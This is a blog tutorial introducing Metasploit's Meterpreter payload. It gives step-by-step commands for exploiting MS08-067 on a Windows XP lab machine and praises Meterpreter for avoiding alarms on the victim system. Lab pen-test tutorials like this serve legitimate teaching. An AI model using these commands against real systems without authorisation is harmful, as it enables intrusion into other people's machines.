Metasploit/exploit #3 Introduction to Meterpreter


 
  
  In this tutorial, I'm going to share on Introduction to Meterpreter . From the previous tutorial, I have demonstrated on how  you can exploit a machine and run an individual payload in the compromise machine.

    Individual or single payload can only do a single task at a time .if you want to execute more than one task in the machine like creating a file, transferring files,  running VNC and others, using a single payload every time you want to attack a system will cost more time and will create more process which might lead to unnecessary alarm in the targeted system . Single or individual payload has other limitation that will jeopardize a pen test job . Some of the reasons are as follow:

Single Payload limitation
  1. Only do a single task at a time
  2. Running multiple task will create a new process and trigger unnecessary alarm in victim system.
  3. Not able to extend it's functionality .
  4. Cannot be customized . .
  However,Metasploit also comes with Meterpreter payload. Meterpreter payload allows us to execute multiple command in the targeted machine . Meterpreter has the interface like your bash command or windows prompt .This will make the pen test job easier to do without so much hassle. In addition to that, there are several reasons on the benefit of running a Meterpreter payload . Below I summarized  few of the reasons:

Advantage of Meterpreter Payload
  1. Uses in memory dll injection .
  2. Communication between msfconsole and meterpreter is in client-server communication.
  3. The communication happens in type length value or TLV parameter.
  4. Equipped with post exploitation scripts .
  5. Has the flexibility to be customized .

How to run Meterpreter  .

Since I'm running the network in my own virtual lab, I will demonstrate this using my Kali Linux machine as the attacker and Windows XP SP2 as the victim .

1) Search for Windows XP vulnerability .

1.1) The exploit that we want to use in this hack is netapi .Search for Module called"netapi" .
Netapi vulnerability
1.2) Use netapi exploit .
Copy the exploite name 
1.3) Type  "use exploit/windows/smb/ms08_067_netapi"

2) Set the Remote Host IP address according to your targeted system IP address .
Show options
 My targeted machine IP address is 10.10.10.4 .
Type "set RHOST 10.10.10.4"
Setting the RHOST

3) Exploit the system by typing "exploit .
Meterpreter
Metasploit will automatically choose Meterpreter Payload to run on the targeted system .That is how easy it is!

Previous
Next Post »